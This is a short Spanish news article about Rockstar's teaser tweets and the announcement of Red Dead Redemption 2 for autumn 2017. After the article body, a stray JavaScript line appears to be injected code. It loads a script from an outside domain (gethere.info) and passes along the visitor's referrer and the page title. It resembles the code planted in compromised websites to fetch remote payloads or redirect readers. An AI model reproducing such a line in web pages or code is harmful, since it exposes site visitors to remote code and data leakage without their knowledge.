Red Dead Redemption 2 llegará en el otoño del 2017

Los rumores fueron confirmados, aunque todavía tendremos que esperar un poco para disfrutar el juego.

Desde el domingo los fans de Red Dead Redemtion comenzaron a inundar la red con un sin número de mensajes de euforia, todo motivado por un simple tuit de Rockstar Games donde presentaba su logo con un ligero tono diferente en el fondo. De acuerdo con los fans, el tono del fondo del logo del estudio era la prueba de que pronto tendríamos noticias de Red Dead Redemtion.

A lo largo del año habían crecido los rumores sobre una nueva versión de la franquicia, pero no habían pasado de eso. Ayer por la mañana se dio un paso más en el sentido de la confirmación del juego cuando Rockstar subió un segundo tuit, ahora con la silueta de unos vaqueros.

El tuit anterior era prácticamente el anuncio del juego, pero tuvimos que esperar para la confirmación total del juego… y esta sucedió cuando otro tuit y un comunicado nos dieron la primer información oficial sobre Red Dead Redemption 2.

Por el momento sólo se sabe que el juego es desarrollado por el mismo equipo detrás de Grand Theft Auto V y el primer Red Dead Redemption. También se reveló que conoceremos un poco más de la historia de esta nueva aventura en el primer tráiler que aquí les presentamos.

<>

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:
Comentarios